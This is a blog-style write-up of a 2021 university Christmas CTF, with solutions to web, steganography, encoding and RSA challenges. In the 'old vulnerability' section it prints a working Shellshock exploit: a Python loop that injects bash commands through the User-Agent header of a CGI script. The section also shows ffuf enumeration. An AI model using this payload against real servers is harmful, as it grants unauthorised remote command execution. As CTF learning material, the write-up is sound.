This CTF is one of the CTF's that I had fun playing , it was having multiple categories and was in Jeopardy Style .

WEB

Mr RoboT

This was the first challenge with the description Hello Mr Robot I directly knew that they want us to check the robots.txt file!

And we have the flag , that was a quick one:) and a fun one!

FLAG : UDOM{d0nt_forg3t_Me_mr_ROBOT}

pPOSTMANm

The next was was named pPOSTMANm , with a description saying celebrate xmas with postman, so what I do now is copy the link to access the challenge and try see what I get from visiting it:

Nothing at all , I now try to send a POST request to the same link and see what I get:

Yep the FLAG

FLAG : UDOM{xmas_with_POSTMAN}

Language

With a description saying Speak a native language!!! this totally scared me to hell lol, what's my native language , So I then understood what they mean , and it had something to do with the header Accept-Language I have to change it to my countries locale and i'll get the flag!

I sent a request in Curl with the header Accept-Language set with value sw-TZ

┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $curl 'http://193.122.147.103:9001/' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://193.122.147.103/' \
  -H 'Accept-Language: sw-TZ' \
  -H 'Cookie: session=8425aad4-0788-42d2-a409-7d780f9fc191.69oMcvm-l0VaAcHr3KgltFHdhgk' \
  -H 'dnt: 1' \
  -H 'sec-gpc: 1' \
  --compressed \
  --insecure

FLAG : UDOM{xmas_c3l3br3t3_in_swahili}

inspectorHTML

Well this one was a classic , the description was see if you can click me and I said why not hehehe! let's click this web chall!

Okay I wasn't able to click that red button so what I did now was inspect the element of it and see what it has that makes it un-clickable

alright we have that disable attribute let's remove it and we will surely have the flag

FLAG : UDOM{CL1CK_CL1CK_B00M}

BAD DEVELOPER

With the description saying can you find the mistake!! and login to get flag why not? I love finding mistakes and bugs and having to login is the best part LOL, so let's open the web app

And we have a login page , let's try have a look at the source code perhaps we might get something and yes! I did try SQLi didn't work!

Okay we have the password now , let's try login with the password and a different username:

And we get an error that , cyrange is the one that uses that password to login to the dashboard so yes that's the mistake it's disclosing information! LOL now let's go get the flag!

FLAG : UDOM{S0m3_M1STAK3_MAD3_DEVELOP3R}

Black and White

This was a fairly easy one with 500 points , with the description saying lets Turn thing Different Now !! come on Big Man , and I knew that they were trynna mock me LOL , coz I am the big man

YESSIRRRRRRRRR!

Aight now let's quit playing hahaha, So I visit the web and i'm like WTH is this…

a black and white page , well I decide to check the source code

Alright something interesting an image that's linked to the attribute with a base64 encoded data type, so let's open this image on a new tab

I now need some milk, it was that easy and had 500 points

FLAG : UDOM{svg-thingcolor}

old vulnerability

Given the description

threatening billions of machines all over the world. like LOG4J LOL!!

i bet flag will be near the developer Center!!

This should be a tricky one, given a hint in robots.txt , so I followed up and used FFUF to grab the filename:

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/old_vuln]
└──╼ $curl http://193.122.147.103:9005/robots.txt
disallowed /xxx-xxx/sh****.sh
disallowed /xxx-xxx/sh****.cgi

We already know that it's cgi-bin, with the command : ffuf -w rockyou.txt -u http://193.122.147.103:9005/cgi-bin/FUZZ.sh

Found it! shelly.sh && shelly.cgi

This is well exploitable but with the help of a quick simple script from my buddy codaholi I was able to finish the job quick!

#/usr/bin/python3
#@author : codaholikid

import requests

url = "http://193.122.147.103:9005/cgi-bin/shelly.sh"

while 1:
    command = input("$ ")
    header = {"User-Agent": "() { :;};echo; /bin/bash -c '%s'"%command}
    r = requests.post(url, headers=header)
    print(r.text.strip())

Now I run the script:

└──╼ $python3 shellshock.py 
$ find / -name "*.txt"

and it gave me a list of files but from it I was able to get the file I need

So now let's read our flag:

$ cat /var/www/flagxxx.txt
UDOM{shell_shock_oldtime}

FLAG : UDOM{shell_shock_oldtime}

I'll skip the ENCODE category because all of them were pretty straight forward and easy so … i'll jump to MISC

MISC

SpellBack

Starting with this challenge named spellback , we are given a string }LLEWLLEPS_nac_uoy{MODU :

┌─[tahaafarooq@cyberwarriors]─[~]
└──╼ $echo "}LLEWLLEPS_nac_uoy{MODU" | rev
UDOM{you_can_SPELLWELL}

FLAG : UDOM{you_can_SPELLWELL}

Joe's Son

This is a fun one , and a challenging one as well, given 57ie9eb182943223bo0b4ej7f17c5e4cb6e and we have to crack it to get the password and then embed the password in UDOM{password} format, I first try to identify the hash and then I realize that the hash is actually corrupted or sort of …

Well basically it should be MD5 , so what I did I took an md5sum of a random file and then checked the length of it and then compared them

>>> hash_a = "a26d7a28043ee37784df3f961bb10d14"
>>> hash_b = "57ie9eb182943223bo0b4ej7f17c5e4cb6e"
>>> len(a)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'a' is not defined
>>> len(hash_a)
32
>>> len(hash_b)
35

okay I now realize I have 3 characters that aren't supposed to be there and basically in a MD5 hash alogirthm we dont have some letters such as o,j,and i, let's remove those and then crack the hash!

So now it identifies the hash as MD2,4,5 : 57e9eb182943223b0b4e7f17c5e4cb6e i'll use an online hash cracker crackstation

And I got the password

FLAG : UDOM{MerryChristmas}

qwert

This was a quiet a challenge, given in the description an image which had nothing and a text GERM?Ekrpat{T3FXRAPE+ , so since it's written qwert I decided to try out keyboard change and then converted the text from a layout of Dvorak to Qwerty

FLAG : UDOM{Dvorak_K3YBOARD}

ENTENSION

Given a string H4sICAVIx2EAA2FyZmcAC3Xx9612j/IMiA8ONzYOqeUCALTGXewRAAAA that we have to get a flag from it , well i'm not speaking gibberish , so I sent the string straight to cyberchef :

FLAG : UDOM{GZIP_SW33T}

suspect

This challenge only had two solvers me and my bwoi codaholikid

Well it was a fun one actually , so basically we are given an image

but nothing I got from it , I tried binwalking over it but still nothing so then I decided to take the hash and go check it out on virustotal

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/suspect]
└──╼ $md5sum suspect.png 
6985be92576b016da18ea0846818fdc4  suspect.png

FLAG : UDOM{TOTAL_virus}

STEG

Morxe

We have this challenge made by my bwoi blackninja , we are given a wav file which has some weird tones inside it and the sounds from it tell me that it's Morse Code , So i directly went to an online morse code decoder

FLAG : WEW1SHM3RRYCHR1SMASSUDOMCYB3RCLUB

stegx

Also had two solvers me again and my bwoi @codaholikid , I solved it by guessing lol, but @codaholikid made a loop , I actually guessed a wordlist , since the description was Not everything can be found in rock

and we are given an image , that has something embedded in it with steghide , so we have to crack the password with stegseek

So we got the password as x4ivygA51F and the file is extracted as output.txt but original name is flag.txt

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/stegx/test]
└──╼ $cat output.txt 
UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}

FLAG : UDOM{st3ganography_1n_jpg_w1th_n0t_rockyou}

bytex

this was quiet a fun one! , given a file which doesn't have any format , and we have to get the flag , the description is Can you see something inside something?? You see, take me out...

Alright so i first download the image:

┌─[tahaafarooq@cyberwarriors]─[~/Desktop/udomcyber_xmas/bytex/test]
└──╼ $file udom 
udom: data

So we find a bunch of NO FLAG NO FLAG , let's dig a bit deep

we can see that there is a JFIF header covered overthere so let's use vim to remove the NO FLAGs and then use eog to view the image

alright we cleaned it! , so let's view it now

FLAG : UDOM{N0w_Y0u_know_How_bytes_begin_and_end_t0o}

Mr Whit3

This is another challenge only solved with me and buddy @codaholikid, uwiii, stuff is kinda challenging , hahaha so basically , the description says Can you see in the light? and we are given a txt file , first thing I do is try and read it but as I do try to read it I came across something , like whitespace , then I realized yes it is whitespace but made with stegsnow, and it also has a password so I have to crack it with a wordlist:

So I wrote a simple script that will help me do the job , excuse my bad coding style :) but as long as it does the jOB then it is elite!

#!/usr/bin/python3
# author : @tahaafarooq#9056

import os

wordlist = open("merryword.txt", "r")
lines = wordlist.readlines()

count = 0

for line in lines:
    count += 1
    os.system("stegsnow -C -p '"+line.strip()+"' merryXmasMrWhite.txt")

So I made a custom wordlist of mine with all words with merry from rockyou.txt and then named the wordlist as merryword.txt

that worked but the only problem is there are alot of results used from every password in the wordlist , so now i'll grep the result

FLAG : UDOM{SN0wcracker_wellDON3}

LINUX

Bash_History

The description said get me!!!, and then we are given a zip file

└──╼ $unzip bash_history.zip 
Archive:  bash_history.zip
   creating: Documents/
   creating: LAB/
   creating: flag/
 extracting: flag.txt                
  inflating: .bash_history           
  inflating: .bash_logout  

we unzip it we get some fils including .bash_history which is interesting and we also get flag.txt

They tricked us!! , SHISH!, But I found something interesting ..

└──╼ $echo "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vZWVMM1ZOMUE="| base64 -d
https://pastebin.com/eeL3VN1A

I got a pastebin link

From the link I followed the mega link and I downloaded an image , and from the image I was able to get the flag

FLAG : UDOM{its_called_OSINT}

ENCODED

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

I'll only write about 3 challenges in this category namely; EASY RSA, MEDIUM RSA, and Ben Olmstead

EASY RSA

We are given a file named rsa.txt which have information about our p and q and n and of course our ciphertext c and exponent ,so now this should be easy:

p = 11116188838939060770257745148147358293555735818304945031904314986499619902861389131692960923447811615331917485192156658652749983632634958762152049925477127
q = 8487919438101303814483748529639602760583915398820568411450788370335198224694701358911154306675934195405262897926286524061449821386207216748726261969771421
e = 65537
c = 29084496881534296943051814218289640762156351681357178292873637784699231017881629945435160527516295265495090841005829367668930442743360493983807041342707012552879343826078826331308441763546747670052757146096657340929494256815236122799603923149019274821906527452186538703951939449064959876032924639999735327975

because we are given everything and we dont have to find any factor of n or anything we just have to create our N, I wrote a simple python script that will do all the Dual Prime RSA calculation and give us our plain text back:

#!/usr/bin/python3
# author : @tahaafarooq

import os
from Crypto.Util.number import inverse

ct = int(input("Enter your cipher text : "))
p = int(input("Enter your P value : "))
q = int(input("Enter your Q value : "))
e = int(input("Enter your exponent : "))

n = p*q
phi = (p-1)*(q-1)
d = inverse(e,phi)
m = pow(ct,d,n)

key = hex(m)[2:-1]
pt = os.system("echo "+key.strip()+" | xxd -r -p")

print(pt)

Make sure you have xxd installed , if you dont have you it you can install it with sudo apt-get install xxd in debian and ubuntu system or pacman -S xxd in arch based systems

So now let's run our script

MEDIUM RSA

This one was a multi prime RSA challenge we were given rsa.txt which had the following:

n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
e = 65537
c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469

So I took the n and used factordb to get the prime factors of the n so as I could the the ps and qs

Okay we have a bunch of ps and qs, had quiet some problem into solving it but came accross a script on github and I edited it abit and I was able to get flag after executing

#!/usr/bin/python3
# author : @tahaafarooq

import os
#from Crypto.Util.number import inverse

factors = [9282105380008121879, 9303850685953812323, 9389357739583927789, 10336650220878499841, 10638241655447339831, 11282698189561966721, 11328768673634243077, 11403460639036243901, 11473665579512371723, 11492065299277279799, 11530534813954192171, 11665347949879312361, 12132158321859677597, 12834461276877415051, 12955403765595949597, 12973972336777979701, 13099895578757581201, 13572286589428162097, 14100640260554622013, 14178869592193599187, 14278240802299816541, 14523070016044624039, 14963354250199553339, 15364597561881860737, 15669758663523555763, 15824122791679574573, 15998365463074268941, 16656402470578844539, 16898740504023346457, 17138336856793050757, 17174065872156629921, 17281246625998849649]

c = 464457186798562586182945605278053614935005234268582950087247481567854082939744760719597884771991031499599824058099416837268890411135171222035332697924212275553908733959100620171336843228935380532463970519390921347781025380408554430005209285855809415548228888212194548360656641334620482684242066910205917692562465781291842336297509525407251255063982764680358893157730953032939994853850484274876323255910245449244667956201667990014757113955721280174240371101303627013686429165140647914539930245979797232335104668519729528139825892384600949788340931006992534788169303627187098449051502953626453569008623810102368469
e = 65537
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637

def egcd(a,b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a,m):
    g, x, y = egcd(a,m)
    if g != 1:
        raise Exception("modular inversion does not exist")
    else:
        return x % m

ts = []
xs = []
ds = []

for i in range(len(factors)):
    ds.append(modinv(e, factors[i]-1))

m = factors[0]

for i in range(1, len(factors)):
    ts.append(modinv(m, factors[i]))
    m = m * factors[i]

for i in range(len(factors)):
    xs.append(pow(c%factors[i], ds[i], factors[i]))

x = xs[0]
m = factors[0]

for i in range(1, len(factors)):
    x = x + m * ((xs[i] - x % factors[i]) * (ts[i-1] % factors[i]))
    m = m * factors[i]

key = hex(x%n)[2:-1]

print(os.system("echo "+key.strip()+" | xxd -r -p"))

└──╼ $python3 mprsa_dec.py 
UDOM{Y0U_GO0T_1T_MANY_PRIM3S_133770

FLAG : UDOM{Y0U_GO0T_1T_MANY_PRIM3S_13377}

Ben Olmstead

It has a description saying You cant win!! but I guess I just knew what I was doing LOL, alright so we are given a file named weirdBase.txt

Alright I was scared , I was like "WHAT IS THE NAME OF HELL IS THIS???" but then I googled the name of the challenge and I came accross something similar:

It's a programming language that I didn't know it existed until I read about it now what to do with the weird string…, I took the string to dcode.fr and then it gave me a ping back that it's ASCII85

And from there I decoded the string and I got this:

this was another weird string and now my mind is curropting I'm like hold up what have I just done LOL, but i remembered about Malbolge programming language and I google a compiler for it and I was able to get an online compiler and run it

And I have the flag finally!!

FLAG : UDOM{malbolge_encoder}

I actually solved all challenges with ma buddy codaholikid, and got #1st with my buddy codaholi leading #2nd

Congrats to Nicholaus , Munojr, szdiof, and mrAlienx

26 | 12 | 2021  | @tahaafarooq(twitter)